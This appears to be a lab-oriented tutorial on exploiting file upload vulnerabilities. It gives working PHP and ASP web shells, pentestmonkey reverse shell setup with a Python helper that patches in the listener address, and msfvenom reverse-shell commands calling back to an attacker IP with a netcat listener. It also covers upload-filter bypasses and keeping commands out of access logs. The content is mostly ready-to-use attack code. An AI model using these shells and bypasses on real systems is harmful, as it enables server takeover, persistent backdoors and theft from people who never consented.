🎯 Core Technique: The final step in exploiting file upload vulnerabilities - deploying web shells and reverse shells for remote code execution
The final step in exploiting a file upload vulnerability is to upload a malicious script in a language the web server will execute, normally the language the web application itself is written in (PHP, ASP.NET, JSP, ...), such as a web shell or a reverse shell script. Once the script is uploaded and we browse to its URL, the server runs it and we can use it to take control of the back-end server.
🖥️ Interactive Control: Web-based command execution interfaces for compromised servers
We can find many excellent web shells online that provide useful features like directory browsing or file transfer. One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell.
SecLists Web Shell Collection:
- Location: /opt/useful/seclists/Web-Shells/ (the HTB Pwnbox path; on a Kali install SecLists lives under /usr/share/seclists/)
- Languages: PHP, ASP, ASPX, JSP, Perl, Python
- Features: various functionality levels, from basic to advanced
Deployment:
- Pick a web shell written in the target's language (PHP, ASP.NET, etc.)
- Upload it through the vulnerable upload feature
- Navigate to the uploaded file's location
- Interact with the web shell interface
Example phpbash deployment:
```
# Upload phpbash.php through vulnerable upload form
# Access via: http://SERVER_IP:PORT/uploads/phpbash.php
```
Expected output:
```
www-data@target:/var/www/html/uploads$ whoami
www-data
www-data@target:/var/www/html/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Advantages:
- Easy to use - terminal-like interface
- File management - upload/download capabilities
- Directory browsing - navigate the server filesystem
- Command execution - run system commands
- Persistent access - remains until removed (record the path so it can be cleaned up at the end of the engagement; it is a backdoor for anyone who finds it)
✍️ Manual Creation: Building simple but effective web shells when online tools aren't available
Basic PHP Web Shell:
```php
<?php system($_REQUEST['cmd']); ?>
```
Usage:
```
# Save as shell.php and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.php?cmd=id
```
Example execution:
```
# URL: http://SERVER_IP:PORT/uploads/shell.php?cmd=id
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
`$_REQUEST` reads GET, POST and cookie parameters, so the command can also be sent in a POST body, which keeps it out of the web server's access log. If `system()` produces no output, it may be listed in PHP's `disable_functions`; try `shell_exec()`, `passthru()` or `exec()` instead.
Improved version with better formatting:
```php
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
```
Basic ASP Web Shell:
```asp
<% eval request('cmd') %>
```
Usage:
```
# Save as shell.asp and upload
# Execute commands via: http://SERVER_IP:PORT/uploads/shell.asp?cmd=whoami
```
Note: `eval request('cmd')` is classic ASP (VBScript) syntax, so it only runs where IIS serves classic .asp pages; uploaded as .aspx it will not compile. An ASP.NET application needs a .aspx shell written in C# or VB.NET that starts a process (for example through System.Diagnostics.Process); SecLists and msfvenom (below) provide ready-made ones.
💡 Pro Tip: When using custom web shells in browsers, use source-view (Ctrl+U) to see command output as it would appear in a terminal, without HTML rendering affecting the formatting.
🔄 Direct Connection: Establish a reverse connection back to the attacker machine for an interactive shell
Popular Reverse Shell Resources:
- Pentestmonkey PHP Reverse Shell - reliable and feature-rich
- SecLists Reverse Shells - multiple languages and frameworks
- RevShells.com - online reverse shell generator
Step 1: Download and Configure
```bash
# Download pentestmonkey PHP reverse shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
```
Edit the configuration near the top of the file (lines 49-50 in the current version; search for `$ip` and `$port` rather than relying on the line numbers):
```php
$ip = '10.10.14.55'; // CHANGE THIS - Your IP
$port = 4444; // CHANGE THIS - Your listening port
```
`$ip` must be an address the target can reach back to, e.g. your VPN interface (tun0) on HTB, not a NATed LAN address.
Step 2: Start Netcat Listener
```bash
nc -lvnp 4444
```
Step 3: Upload and Execute
```
# Upload php-reverse-shell.php through vulnerable upload form
# Navigate to: http://SERVER_IP:PORT/uploads/php-reverse-shell.php
# Reverse shell connection established
```
Expected Connection:
```
kabaneridev@htb[/htb]$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.55] from (UNKNOWN) [188.166.173.208] 35232
Linux target 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# whoami
www-data
```
Advantages:
- Interactive shell - commands run in a real process on the target; upgrade it to a full TTY (e.g. python3 -c 'import pty; pty.spawn("/bin/bash")') for job control, tab completion and interactive programs such as su or sudo
- Better stability - more reliable than a web shell
- Direct connection - no need for the web interface
- File transfer capabilities - easy upload/download
- Tunneling possibilities - can tunnel other tools
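Step 1 tells you to edit lines 49-50 of php-reverse-shell.php; those numbers shift between versions of the file, and a typo in the IP costs a silent failed callback. The following helper is an added example, not part of the notes or of the pentestmonkey project: it patches the `$ip`/`$port` lines wherever they are and validates the values first. SAMPLE_TEMPLATE is a constructed stand-in for the real file, which you would read from disk; the regexes assume the `$ip = '...';` / `$port = ...;` form shown in the notes.

```python
"""Configure a pentestmonkey-style PHP reverse shell without relying on
line numbers.

Added example, not part of the notes or of the pentestmonkey project.
Assumes the file holds `$ip = '...';` and `$port = ...;` lines as shown in
the notes. SAMPLE_TEMPLATE is a constructed stand-in for the downloaded file.
"""
import ipaddress
import re

SAMPLE_TEMPLATE = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
"""

# Match the whole assignment line; groups keep the surrounding text intact.
_IP_RE = re.compile(r"^(\s*\$ip\s*=\s*)'[^']*'(\s*;)", re.M)
_PORT_RE = re.compile(r"^(\s*\$port\s*=\s*)\d+(\s*;)", re.M)


def configure_reverse_shell(source: str, lhost: str, lport: int) -> str:
    """Return the shell source with $ip/$port pointing at our listener."""
    ipaddress.ip_address(lhost)  # raises ValueError on a typo such as 10.10.14.999
    if not 1 <= lport <= 65535:
        raise ValueError(f"bad port {lport}")
    out, n_ip = _IP_RE.subn(rf"\g<1>'{lhost}'\2", source, count=1)
    out, n_port = _PORT_RE.subn(rf"\g<1>{lport}\2", out, count=1)
    if n_ip != 1 or n_port != 1:
        raise ValueError("no $ip/$port assignment found; file layout changed?")
    return out


def configured_values(source: str):
    """Read back (ip, port) so the result can be confirmed before uploading."""
    ip = re.search(r"\$ip\s*=\s*'([^']*)'", source).group(1)
    port = int(re.search(r"\$port\s*=\s*(\d+)", source).group(1))
    return ip, port


if __name__ == "__main__":
    import sys
    # usage: python3 configure_shell.py php-reverse-shell.php 10.10.14.55 4444
    path, lhost, lport = sys.argv[1], sys.argv[2], int(sys.argv[3])
    with open(path) as f:
        src = f.read()
    patched = configure_reverse_shell(src, lhost, lport)
    with open(path, "w") as f:
        f.write(patched)
    print("configured", configured_values(patched))
```

Run it against the downloaded file, then start the `nc -lvnp 4444` listener from Step 2 before uploading the result.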
🛠️ Automated Creation: Using msfvenom to generate custom reverse shell payloads
PHP Reverse Shell:
```bash
msfvenom -p php/reverse_php LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.php
```
JSP Reverse Shell:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f raw > reverse.jsp
```
ASPX Reverse Shell:
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f aspx > reverse.aspx
```
WAR Reverse Shell (Tomcat):
```bash
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.55 LPORT=4444 -f war > reverse.war
```
Start the same `nc -lvnp 4444` listener before browsing to the uploaded file. For PHP payloads, check that the generated file starts with an opening `<?php` tag: some Metasploit PHP payloads (php/meterpreter/reverse_tcp, for example) emit it commented out as `/*<?php /**/` and will not run until it is restored.
Advantages:
- Multiple formats - raw, aspx, war and others, matching the target technology
- Framework specific - payloads for PHP, JSP, ASP.NET and Java servlet containers
- Encoders available - -e selects an encoder, but msfvenom output is heavily signatured, so do not expect it to evade antivirus or a WAF on its own; a short hand-written shell is often quieter
Practice exercise:
- Target: 94.237.49.23:52640
- Objective: upload a web shell and retrieve /flag.txt
- Technique: file upload exploitation
Step 1: Create Simple Web Shell
```php
<?php system($_REQUEST['cmd']); ?>
```
Step 2: Upload Web Shell
```
# Save as shell.php
# Upload through vulnerable upload form
# Note upload location (e.g., /uploads/)
```
Step 3: Execute Commands
```
# Access: http://94.237.49.23:52640/uploads/shell.php?cmd=id
# Test command execution works
# Find flag: http://94.237.49.23:52640/uploads/shell.php?cmd=cat /flag.txt
```
A browser encodes the space in `cat /flag.txt` for you; with curl, URL-encode it yourself (cmd=cat%20/flag.txt), and encode any `&`, `#` or `;` in the command the same way or it will be cut off.
Expected Flag Format:
```
HTB{...}
```
If basic upload fails:
- Try different extensions: .phtml, .php3, .php4, .php5 (they only execute if the server's handler configuration maps them to PHP)
- Modify Content-Type: change it to image/jpeg while keeping the PHP content
- Add magic bytes: prepend GIF89a to the PHP code so content checks see an image signature
- Use a reverse shell: deploy the pentestmonkey or msfvenom payload
Together these techniques take a file upload vulnerability through to remote code execution: a web shell gives quick command execution through the browser, and a reverse shell (hand-written or generated with msfvenom) gives a stable interactive session leading to full server compromise.